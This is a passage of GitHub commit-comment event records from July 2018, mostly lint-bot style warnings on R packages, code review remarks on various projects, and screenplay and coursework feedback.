{\n^~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:617:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L617) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​tail.agentMatrix <- function(x, n = 6L, ...) {\n^~~~~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:638:36:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L638) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​cbind.agentMatrix <- function(..., deparse.level) {\n                                   ^~~~~~~~~~~~~\n```\n[R/agentMatrix-Class-methods.R:662:36:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentMatrix-Class-methods.R#L662) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​rbind.agentMatrix <- function(..., deparse.level = 1) {\n                                   ^~~~~~~~~~~~~\n```\n[R/agentset-functions.R:1537:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentset-functions.R#L1537) *style:* **Lines should not be more than 100 characters.**\n```r\n​        pOverL <- over(pBuffer, SpatialPoints(coords = agents2cAll, proj4string = .projNowhere), returnList = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/agentset-functions.R:1549:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/agentset-functions.R#L1549) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       SpatialPoints(coords = agents2@.Data[, c(\"xcor\", \"ycor\"), drop = FALSE], proj4string = .projNowhere),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/patch-functions.R:609:1:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/patch-functions.R#L609) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @seealso \\url{https://ccl.northwestern.edu/netlogo/docs/dictionary.html#patch-at-heading-and-distance}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plot.R:37:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/plot.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Ras <- world2raster(x)\n  ^~~\n```\n[R/plot.R:53:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/plot.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Ras <- world2raster(x)\n  ^~~\n```\n[R/quickPlot.R:179:39:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/quickPlot.R#L179) *style:* **Commas should always have a space after.**\n```r\n​    grobToPlot@.Data <- toPlot@.Data[,,sGrob@layerName];\n                                      ^\n```\n[R/world-functions.R:517:25:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L517) *style:* **Put spaces around all infix operators.**\n```r\n​          mid <- floor(n/2)\n                       ~^~\n```\n[R/world-functions.R:534:9:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L534) *style:* **Commented code should be removed.**\n```r\n​    #   cat(\"names       :\", paste(ln, collapse=\", \"), \"\\n\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/world-functions.R:538:28:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L538) *style:* **Commas should always have a space after.**\n```r\n​    print(object@.Data[1:4,1:4,])\n                           ^\n```\n[R/world-functions.R:538:32:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/world-functions.R#L538) *style:* **Commas should always have a space after.**\n```r\n​    print(object@.Data[1:4,1:4,])\n                               ^\n```\n[R/worldNLR-classes-methods.R:340:5:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/R/worldNLR-classes-methods.R#L340) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    NLwMs <- list(...)\n    ^~~~~\n```\n[tests/testthat/test-plotting.R:6:3:](https://github.com/PredictiveEcology/NetLogoR/blob/bc3a18ff2853838085c6bc1b287c04e74b0f1437/tests/testthat/test-plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  t1_0 <- createTurtles(n = 10, coords = cbind(rep(0, 10), rep(0, 10)))\n  ^~~~\n```"}},"created_at":"2018-07-18T04:20:28Z"}
{"id":"7980557930","type":"CommitCommentEvent","actor":{"login":"jedbrown"},"repo":{"name":"path1380/FEM_Parth"},"payload":{"comment":{"id":29743859,"position":45,"line":272,"path":"src/local_mat.f90","commit_id":"046adf71f5bfed549cf89ba39d101ad8eb6e221d","created_at":"2018-07-18T04:21:04Z","updated_at":"2018-07-18T04:21:04Z","author_association":"COLLABORATOR","body":"If your 1D basis has `P` basis functions and `Q` quadrature points and you use a tensor product basis in `d` dimensions, then the loop strategy you have here costs `O(P^d Q^d)` when it can be `O(max(P,Q)^{d+1})`. Better to put interpolation and gradient evaluation into a subroutine that uses tensor contractions."}},"created_at":"2018-07-18T04:21:04Z"}
{"id":"7980558007","type":"CommitCommentEvent","actor":{"login":"vishalnagda1"},"repo":{"name":"vishalnagda1/react_todo_app"},"payload":{"comment":{"id":29743860,"position":15,"line":15,"path":"src/components/add_todo.js","commit_id":"257ec40707269a9a6b6b04459a09a852fc3e93a8","created_at":"2018-07-18T04:21:06Z","updated_at":"2018-07-18T04:21:06Z","author_association":"OWNER","body":"You mean instead of `this.props.todoAdd({ label: this.state.label, is_checked: false });`. I should write code like :\r\n```\r\nthis.props.todoAdd({ label: this.state.label });\r\nthis.props.todoAdd({ is_checked: false });\r\n```\r\nif I write like this then it'll increase the count of the callbacks of `todoAdd` method as `setState` as well. If `setState` is called two times then the it will render the UI twice."}},"created_at":"2018-07-18T04:21:06Z"}
{"id":"7980579966","type":"CommitCommentEvent","actor":{"login":"keunwoochoi"},"repo":{"name":"keunwoochoi/transfer_learning_music"},"payload":{"comment":{"id":29743907,"position":208,"line":208,"path":"1. feature extraction for 6 tasks.ipynb","commit_id":"77dd66d77b5d4990ac1e493e2d69d589d6c85da1","created_at":"2018-07-18T04:30:23Z","updated_at":"2018-07-18T04:30:23Z","author_association":"OWNER","body":"Ok, now I don’t recall but yes, it’s probably because the behaviour of Pandas has changed, but please don’t get confused, probably you’re correct if an error occurs.\r\n\r\nOn 12Jul 2018, at 01:35, 1federico1 <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n\r\nWhat is the expected behavior of this line of code ? I mean, when you do os.path.join(FOLDER_CSV, csv_filename) what do you expect in output ? Because var filename is a list of paths, and the result, to my knowledge, is still a list. So when you do pd.DataFrame.from_csv(list) you get a path that is of the form FOLDER_CSV/[list of paths].csv, causing an error on finding the file. Maybe my problem is that I'm using the wrong version of pandas (0.22). What did you use ? Thanks in advance.\r\nP.S. I'm also using Python 2.7.15rc1 on Ubuntu 18.04.\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/keunwoochoi/transfer_learning_music/commit/77dd66d77b5d4990ac1e493e2d69d589d6c85da1#commitcomment-29673785>, or mute the thread<https://github.com/notifications/unsubscribe-auth/APZ8xTr6W4N2u-SRTSRWjRCln6XkDslLks5uFilCgaJpZM4VLeJP>.\r\n\r\n"}},"created_at":"2018-07-18T04:30:23Z"}
{"id":"7980579970","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29743908,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T04:30:23Z","updated_at":"2018-07-18T04:30:23Z","author_association":"NONE","body":"159125973_Issue#6843 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-18T04:30:23Z"}
{"id":"7980582579","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743909,"position":41,"line":84,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:31:30Z","updated_at":"2018-07-18T04:31:30Z","author_association":"OWNER","body":"I notice that you removed the section header line (`##`) here. Section headers are invisible in `the-heir.pdf`, but they create structure for other tools to use and are visible in `the-heir_treatment.pdf` One effect sections have on the treatment file is break the text into paragraphs."}},"created_at":"2018-07-18T04:31:30Z"}
{"id":"7980583457","type":"CommitCommentEvent","actor":{"login":"alphaxaon"},"repo":{"name":"alphaxaon/EventWrapper"},"payload":{"comment":{"id":29743910,"position":null,"line":null,"path":null,"commit_id":"d8be13009459e269a607798795eb1f77db656a53","created_at":"2018-07-18T04:31:49Z","updated_at":"2018-07-18T04:31:49Z","author_association":"OWNER","body":"Need to probably clear regular switches as well.."}},"created_at":"2018-07-18T04:31:49Z"}
{"id":"7980585750","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18011/programming-term2"},"payload":{"comment":{"id":29743915,"position":null,"line":null,"path":null,"commit_id":"ba9facf41cfe5f5b8630bbb5d83093e036c02a3b","created_at":"2018-07-18T04:32:38Z","updated_at":"2018-07-18T04:32:38Z","author_association":"NONE","body":"課題3\r\n\r\n後ほど説明しますが、この課題でやってもらったことは「pythonのコードを書くこと」でなく、「マークダウン形式の文書を書くこと」です。\r\n\r\nまず、拡張子がpyの時点で不正解です。成果物を配置するPathは問題文に書いてますよ。ちゃんと読んでください。自分がケアレスミスしがちという自覚があれば指差しで音読しながら3回読みましょう。\r\n\r\nまた、配置するディレクトリも違います。srcでなくdocsディレクトリです。\r\n\r\nまず下記の形でファイル名と置き場所から修正してください。\r\n下記のコマンドは何をやってるかひとつひとつ理解してください。ただ打つのはダメです。\r\n\r\n$ cd programming-term2\r\n$ mkdir docs\r\n$ mkdir docs/algo-s2\r\n$ cd src/algo-s2/\r\n$ git mv task20180717_3.py task20180717_3.md\r\n$ git mv task20180717_3.md ../../docs/algo-s2/"}},"created_at":"2018-07-18T04:32:38Z"}
{"id":"7980586944","type":"CommitCommentEvent","actor":{"login":"ivan133"},"repo":{"name":"ivan133/react-json-logic"},"payload":{"comment":{"id":29743916,"position":null,"line":null,"path":null,"commit_id":"7b446512b287ded0f70808a271078a67ec51cb62","created_at":"2018-07-18T04:33:06Z","updated_at":"2018-07-18T04:33:06Z","author_association":"OWNER","body":"It's not done yet.\r\nI'm still trying to compile it."}},"created_at":"2018-07-18T04:33:06Z"}
{"id":"7980588030","type":"CommitCommentEvent","actor":{"login":"vishalnagda1"},"repo":{"name":"vishalnagda1/react_todo_app"},"payload":{"comment":{"id":29743917,"position":37,"line":90,"path":"src/components/todo.js","commit_id":"42f46562ed008e9c79b8a99e353c9da77b18ff82","created_at":"2018-07-18T04:33:34Z","updated_at":"2018-07-18T04:33:34Z","author_association":"OWNER","body":"refactor the code as you suggested"}},"created_at":"2018-07-18T04:33:34Z"}
{"id":"7980595059","type":"CommitCommentEvent","actor":{"login":"Karsten1987"},"repo":{"name":"ros/pluginlib"},"payload":{"comment":{"id":29743937,"position":7,"line":89,"path":"pluginlib/cmake/pluginlib_export_plugin_description_file.cmake","commit_id":"ea26e41146ba357d92a07c1ee3e272ce019d2ded","created_at":"2018-07-18T04:36:02Z","updated_at":"2018-07-18T04:36:02Z","author_association":"NONE","body":"I think this should be:\r\n```\r\ninstall(FILES ${relative_filename} DESTINATION share/${PROJECT_NAME}/${relative_dir})\r\n```\r\nThat worked for me"}},"created_at":"2018-07-18T04:36:02Z"}
{"id":"7980597381","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743945,"position":83,"line":129,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:37:00Z","updated_at":"2018-07-18T04:37:00Z","author_association":"OWNER","body":"Scene headers need an empty line before and after in Fountain."}},"created_at":"2018-07-18T04:37:00Z"}
{"id":"7980599383","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18011/programming-term2"},"payload":{"comment":{"id":29743951,"position":null,"line":null,"path":null,"commit_id":"ba9facf41cfe5f5b8630bbb5d83093e036c02a3b","created_at":"2018-07-18T04:37:53Z","updated_at":"2018-07-18T04:37:53Z","author_association":"NONE","body":"課題3(内容について)\r\n\r\nトップレベルの見出しを別に\r\n「7/17(火) 課題3」\r\nとして追加しましょう。\r\n\r\n「やってみた感想」と「講義内容と釘付けられる部分」は2番目のレベルの見出し(##)にしてください。\r\n\r\nまた、シャープの後には空白1つが必要です。\r\n\r\n最終的な形はpush後、ブラウザにて確認してください。\r\n後ほど説明します。"}},"created_at":"2018-07-18T04:37:53Z"}
{"id":"7980600025","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743953,"position":87,"line":133,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:38:10Z","updated_at":"2018-07-18T04:38:10Z","author_association":"OWNER","body":"I have a typo in this line--`crating` instead of `creating`."}},"created_at":"2018-07-18T04:38:10Z"}
{"id":"7980603082","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29743957,"position":null,"line":null,"path":null,"commit_id":"43ae6fa926a38d00aa072d95b388b2d7dd5309d4","created_at":"2018-07-18T04:39:29Z","updated_at":"2018-07-18T04:39:29Z","author_association":"CONTRIBUTOR","body":"plz, there's absolutely nothing wrong with 114k `~>ping`s in 1 day :^)"}},"created_at":"2018-07-18T04:39:29Z"}
{"id":"7980604468","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743963,"position":86,"line":132,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:40:04Z","updated_at":"2018-07-18T04:40:04Z","author_association":"OWNER","body":"I'm uncertain about introducing a new location, even for an intercut. In addition to the logistics of filming in a different location, I'm ambivalent about bringing any of the action outside the storage yard's fence."}},"created_at":"2018-07-18T04:40:04Z"}
{"id":"7980607155","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743967,"position":109,"line":152,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:41:15Z","updated_at":"2018-07-18T04:41:15Z","author_association":"OWNER","body":"Curious to hear more about the dusty cover!"}},"created_at":"2018-07-18T04:41:15Z"}
{"id":"7980609550","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743975,"position":128,"line":170,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:42:20Z","updated_at":"2018-07-18T04:42:20Z","author_association":"OWNER","body":"I think you meant `whose`"}},"created_at":"2018-07-18T04:42:20Z"}
{"id":"7980610808","type":"CommitCommentEvent","actor":{"login":"benmccann"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29743981,"position":null,"line":null,"path":null,"commit_id":"3c4cdd07611f11e1713421c2760189c22a28ee46","created_at":"2018-07-18T04:42:51Z","updated_at":"2018-07-18T04:42:51Z","author_association":"COLLABORATOR","body":"Is there any page that links to this one? I'd be interested to check it out, but couldn't find it on the website"}},"created_at":"2018-07-18T04:42:51Z"}
{"id":"7980612962","type":"CommitCommentEvent","actor":{"login":"benmccann"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29743986,"position":116,"line":116,"path":"docs/userguide/ml/Moneyball Linear regression.md","commit_id":"3c4cdd07611f11e1713421c2760189c22a28ee46","created_at":"2018-07-18T04:43:50Z","updated_at":"2018-07-18T04:43:50Z","author_association":"COLLABORATOR","body":"could write this as:\r\n\r\n    double[] runDifference = new double[] { 135 };"}},"created_at":"2018-07-18T04:43:50Z"}
{"id":"7980615258","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743989,"position":143,"line":185,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:44:52Z","updated_at":"2018-07-18T04:44:52Z","author_association":"OWNER","body":"I think everything wants to stay inside the yard. (a point of terminology--a unit is an individual space with a door, something one can rent. The whole facility is the storage yard)"}},"created_at":"2018-07-18T04:44:52Z"}
{"id":"7980615762","type":"CommitCommentEvent","actor":{"login":"Flyfly-bird"},"repo":{"name":"DuGuQiuBai/Java"},"payload":{"comment":{"id":29743991,"position":null,"line":null,"path":null,"commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-18T04:45:07Z","updated_at":"2018-07-18T04:45:07Z","author_association":"NONE","body":"能看的本来就不多，还这么多乱码。嫌弃"}},"created_at":"2018-07-18T04:45:07Z"}
{"id":"7980615815","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/purpleteam-orchestrator"},"payload":{"comment":{"id":29743992,"position":null,"line":null,"path":null,"commit_id":"1850cdf2756a3410d620ff1b9898edad9f334c54","created_at":"2018-07-18T04:45:08Z","updated_at":"2018-07-18T04:45:08Z","author_association":"OWNER","body":"As per #4 "}},"created_at":"2018-07-18T04:45:08Z"}
{"id":"7980617416","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18015/programming-term2"},"payload":{"comment":{"id":29743995,"position":null,"line":null,"path":null,"commit_id":"d8c5e55d7c8618c07fdbfe2bd880f48e70cbb1c3","created_at":"2018-07-18T04:45:47Z","updated_at":"2018-07-18T04:45:47Z","author_association":"NONE","body":"内容的にはOKですが、ディレクトリが指示と違いますね。\r\n\r\nソースコードは\r\nsrc/algo-s2/ ディレクトリ\r\nに、文書は\r\ndocs/algo-s2/ ディレクトリ\r\nに配置してください。"}},"created_at":"2018-07-18T04:45:47Z"}
{"id":"7980618504","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29743996,"position":186,"line":227,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:46:16Z","updated_at":"2018-07-18T04:46:16Z","author_association":"OWNER","body":"If we show the graveyard, how do we explain its connection to the storage yard?"}},"created_at":"2018-07-18T04:46:16Z"}
{"id":"7980618813","type":"CommitCommentEvent","actor":{"login":"madhuraapatwardhan"},"repo":{"name":"GRAND-PROJECT/research_papers"},"payload":{"comment":{"id":29743997,"position":null,"line":null,"path":null,"commit_id":"6e8df04b69f93f98c9133eaa111479eb9dfd5689","created_at":"2018-07-18T04:46:24Z","updated_at":"2018-07-18T04:46:24Z","author_association":"NONE","body":"yeah!!\r\n![iot](https://user-images.githubusercontent.com/37070073/42860309-828a0010-8a73-11e8-84ab-0b740a4c608f.png)\r\n[Survey Paper on Internet of Things IoT.pdf](https://github.com/GRAND-PROJECT/research_papers/files/2204456/Survey.Paper.on.Internet.of.Things.IoT.pdf)\r\n\r\n"}},"created_at":"2018-07-18T04:46:24Z"}
{"id":"7980620183","type":"CommitCommentEvent","actor":{"login":"chenjiajing23"},"repo":{"name":"chenjiajing23/learngit"},"payload":{"comment":{"id":29743998,"position":null,"line":null,"path":null,"commit_id":"99fde028f846baae16151cc0b440cfd9b023af1e","created_at":"2018-07-18T04:46:58Z","updated_at":"2018-07-18T04:46:58Z","author_association":"OWNER","body":"hi git!"}},"created_at":"2018-07-18T04:46:58Z"}
{"id":"7980621076","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29744017,"position":194,"line":235,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:47:21Z","updated_at":"2018-07-18T04:47:21Z","author_association":"OWNER","body":"Penny's unit is on the opposite side of the yard from the motorcycle graveyard. We really need to get you out to the location :=)"}},"created_at":"2018-07-18T04:47:21Z"}
{"id":"7980625917","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29744024,"position":218,"line":256,"path":"the-heir.fountain","commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:49:27Z","updated_at":"2018-07-18T04:49:27Z","author_association":"OWNER","body":"Not sure how this works. Anna burns everything when she burns her baggage: she has burned her troubles, her memories and her hope of recovery."}},"created_at":"2018-07-18T04:49:27Z"}
{"id":"7980632931","type":"CommitCommentEvent","actor":{"login":"palinek"},"repo":{"name":"palinek/nm-tray"},"payload":{"comment":{"id":29744036,"position":12,"line":349,"path":"src/tray.cpp","commit_id":"7120cf930014a53efbbc546ae38f69ab7492cac0","created_at":"2018-07-18T04:52:19Z","updated_at":"2018-07-18T04:52:19Z","author_association":"OWNER","body":"It's read automagicaly by `QSettings` -> http://doc.qt.io/qt-5/qsettings.html#platform-specific-notes. So you just need to add `/usr/share` into `XDG_CONFIG_DIRS`"}},"created_at":"2018-07-18T04:52:19Z"}
{"id":"7980633286","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29744037,"position":null,"line":null,"path":null,"commit_id":"849fcdee6d15f87bd70522807933016bd6049f41","created_at":"2018-07-18T04:52:29Z","updated_at":"2018-07-18T04:52:29Z","author_association":"OWNER","body":"Thank you for doing the work, @DanielWellsDFW ! There are a lot of comments, most of them on technical issues of the Fountain format. I'm super glad to have you on this project, and am excited to see your contributions!\r\n\r\nThank you."}},"created_at":"2018-07-18T04:52:29Z"}
{"id":"7980636303","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29744040,"position":null,"line":null,"path":null,"commit_id":"10c64dd848612388f7a9f71359233601b058fc68","created_at":"2018-07-18T04:53:46Z","updated_at":"2018-07-18T04:53:46Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", 